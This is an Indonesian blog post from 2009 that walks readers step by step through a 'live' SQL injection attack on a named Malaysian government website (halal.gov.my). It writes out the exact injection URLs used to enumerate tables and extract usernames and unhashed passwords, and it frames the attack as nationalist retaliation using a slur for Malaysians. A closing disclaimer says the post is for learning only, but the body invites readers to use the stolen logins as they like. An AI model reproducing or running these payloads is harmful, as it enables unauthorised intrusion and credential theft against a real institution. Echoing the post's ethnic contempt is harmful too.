Rabu, Januari 07, 2009

LIVE hack MaLiNGSiaL

Rabu, Januari 07, 2009  Reko Srowako Blogger  No comments

http://anti-indon-area.blogspot.com kita lagi konsen ma israel.. dia malah nyerang.. wah.. emang tuch.. kelakuannya mirip ama israel dan sekutu US tuch.. malingsial!!

Engk ada malu-malunya .... !! Bukannya support palestine(berduka) .... !!

Sekedar memsupport rekan-rekan sepropesi ... !! berikut saya buat secara live(siaran langsung SQL Inject ke Malingsial), memang mudah sich, tetapi buat belajar masih oke ..... !! BRAVO.

http://www.halal.gov.my << ada bug sql ... ini salah satunya yang passwordnya tidak di hash

Langkah 1 Cari dan buktikan
http://www.halal.gov.my/corporate.php?ID=116+AND+1 << ini ada news
http://www.halal.gov.my/corporate.php?ID=116+AND+1' << kalau kita beri tanda ['] << kutip maka error ... nah ini yang di sebut SQL Injection BUG

langkah 2 Gunakan metode SQL Injection ke target
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 1 << ada kesalahan sql tidak ... ternyata tidak ... lanjut ke
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 2 << tidak ada error
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 3 << no error
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 4 << sama jg
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 5 << ini jg tidak ada error
jangan putus asa .... !!
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 10 << NAH ini ada ERROR
cukup disini .. kita lihat 1-9 tidak terjadi error .... berarti ada 9 colom.

Langkah 3 Pastikan kita bisa masuk ke target
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 union all select 1,2,3,4,5,6,7,8,9-- << kita lihat kolom berapa kita bisa lanjutkan SQL Injection berikutnya.
BRAVO colom ke-2 ternyata bisa kita isi Inject.
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 union all select 1,version(),3,4,5,6,7,8,9-- << MYSQL ver 5.0.45

Langkah 4 Lihat DataBase target
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,table_name,3,4,5,6,7,8,9 from information_schema.tables-- << Lihat Data TABLE
Wow ada yang menarik dari TABLE target yaitu table tbluser << catat di notepad
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,column_name,3,4,5,6,7,8,9 from information_schema.columns-- << Lihat Data semua Columns
Disini kita dapat lihat kembali apa yang menarik dari columns yaitu
columns fldusername,fldpassword << dari table tbluser

Langkah 5 Hasil SQL Inject
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,fldusername,3,4,5,6,7,8,9 from tbluser-- << Isi Table tbluser & column fldusername
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,fldpassword,3,4,5,6,7,8,9 from tbluser-- << Isi Table tbluser & column fldpassword

Kesimpulan:
Cukup disini anda dapat mengumpulkan Login dan Password dari situs target
berikutnya terserah anda .... dan berkreasilah .... !!

Notes:
Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
Bila pembaca artikel ini menganggap artikel ini menyinggung perasaan, maka Penulis
memohon maaf sebesar-besarnya.

Posted in: ,,

0 komentar:

Posting Komentar

Bagaimana Komentar Anda
U Comment ... I Follow
Berikan komentar anda dalam bentuk Saran/Kritik.
Sedikit atau banyak komentar anda, Penulis akan Following ke URL anda.
Lengkapi URL/identitas anda.

Twitter Delicious Facebook Digg Stumbleupon Favorites More